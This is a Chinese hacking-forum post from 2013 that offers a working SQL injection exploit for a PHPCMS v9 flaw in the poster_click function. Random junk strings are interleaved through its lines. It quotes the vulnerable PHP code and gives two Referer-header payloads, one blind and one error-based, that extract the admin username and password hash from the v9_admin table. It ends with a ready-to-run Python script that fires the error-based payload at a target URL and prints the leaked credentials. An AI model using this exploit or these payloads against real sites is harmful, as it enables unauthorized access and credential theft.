找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2285|回复: 0
打印 上一主题 下一主题

phpcms post_click注入0day利用代码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:01:00 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
7 N: q: O% c( l
1 `9 X; C6 i( }/ c: z; N3 L; J! \5 ?1 Q问题函数\phpcms\modules\poster\index.php' i: Z' J1 y/ ]) v

$ g1 |, k! }2 W, t  tpublic function poster_click() {
9 D  w9 e8 O# \. x2 m$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
. L. w( ?" {9 W# p( u% R) W6 z$r = $this->db->get_one(array('id'=>$id));
( J( Y. X0 r! e" gif (!is_array($r) && empty($r)) return false;
+ p" s( Z7 Y* ?7 Z0 b$ip_area = pc_base::load_sys_class('ip_area');
5 X6 T% M; i! p, i8 ]. t3 j( V* c$ip = ip();4 F4 x7 w  I; Q
$area = $ip_area->get($ip);: o$ J1 _. U7 V% y/ ?' `8 d0 d
$username = param::get_cookie('username') ? param::get_cookie('username') : '';# R, _8 G6 B' x/ t/ S' f5 L' k
if($id) {" g# _( B3 q) P1 u8 h. F
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
% x* b1 U7 h5 ?& e3 U+ Q$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));( o) P' g7 C4 y' X
}! J1 R: R" F0 ~; d
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));  W# X; d  p" N: B7 h0 Q0 L
$setting = string2array($r['setting']);7 v6 ^! h; E- [4 `$ H$ w% s* i4 n( n
if (count($setting)==1) {' u. Y; J2 S; R6 T4 G
$url = $setting['1']['linkurl'];
" ]2 k$ z+ |& @% d} else {6 [! o. p" R# n5 ^) R, V" i" R- h4 c
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];" p- o- M( A: Z' [& h# k
}8 }2 J3 M! |0 _# A( h/ g
header('Location: '.$url);
+ e, V# T# q- N2 S}$ B& ?5 {" o9 _; y! m' D5 l( h$ l
7 a8 C2 q& I- _, }7 G& R2 Z
$ r8 V5 c8 T2 Q" ]; _' `8 `

0 R* n7 z3 K! J7 n, M利用方式:
5 m6 w* X3 g" }" x& {" T1 ^9 y2 f2 e( v
1、可以采用盲注入的手法:; X3 m% O  g2 X2 V& L+ \$ A# x
2 r# I! t* ]& Y" p
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#9 S. s- K, _2 {4 k
5 l" q* h* t& \5 c# J1 C: a
通过返回页面,正常与否一个个猜解密码字段。+ L: h- X! V2 o# a' H' \/ E1 {

" I% m) Z' F, ]( ?" n2、代码是花开写的,随手附上了:
# i; p& k+ N7 S8 a& ?3 j& O
- b( z. l- S- v& x/ z' @0 W! S" G9 ~1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#3 S0 `! |7 P6 D4 l" A2 o2 [: p( f
3 V( w3 _8 \- k9 }; |
此方法是爆错注入手法,原理自查。
0 s/ C# T8 G; K) J/ ?: G2 K1 i$ \0 q+ D7 M( t6 a
2 M5 F, N  R0 x' i6 V

: N0 }+ a$ R, L$ y% L9 V利用程序:
7 }: C5 b! \+ @5 a, f5 a
! _6 o% L; T, ?( v+ y" K/ t' `8 r2 q#!/usr/bin/env python  C0 a9 b  z3 t' b# R" c* ]
import httplib,sys,re
9 `* ^/ q4 r* T6 M6 ]8 ^* v
/ {+ ?' ^+ j3 u# ~8 odef attack():
( r0 w, ~! b! L' z, p7 _print “Code by Pax.Mac Team conqu3r!”3 N1 H# ~7 ]6 P/ Q: s- I+ `7 t# [
print “Welcome to our zone!!!”& e. [# {/ O, j) F1 X+ \
url=sys.argv[1]
$ m! l8 {" w' Hpaths=sys.argv[2]
0 S; l0 x/ J" Fconn = httplib.HTTPConnection(url)
0 O) y" I  P& I, |5 Oi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,+ R+ a/ o6 H0 D6 H' B- N# i
“Accept”: “text/plain”,' K7 H5 L" P; m" s0 x
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}' U6 q" ^5 F6 ]5 d2 E
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
( V" l- c' W8 @( J1 X. V8 ^! m! m$ Pr1 = conn.getresponse()0 t& v- U& w" ?2 V# K2 c
datas=r1.read()
) r" t) L: s% ~. A1 N( k! fdatas=re.findall(r”Duplicate entry \’\w+’”, datas): b4 K* Z/ e9 y
print datas[0]
0 V! ~/ w3 ^1 B) r; {2 L2 oconn.close()+ `2 q6 _( Y7 s
if __name__==”__main__”:
( }' |! g( C2 B; D* wif len(sys.argv)<3:! V& X. n" m7 V1 o  C
print “Code by Pax.Mac Team conqu3r”4 j# }& A. W; k+ C" C7 s
print “Usgae:”
/ Y; F4 z) f/ o5 E5 Hprint “    phpcmsattack.py   www.paxmac.org /”5 H9 |$ ~4 x* N+ c
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”. ]6 ~  s# u3 {2 I, r7 c) e
sys.exit(1)0 ]1 j4 n9 j8 f0 N/ m* H8 I0 |
attack()
( y& Y* Q2 b- }4 R) q9 u7 C8 f% {$ I) t7 {9 R3 z4 w. V! q  f/ W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表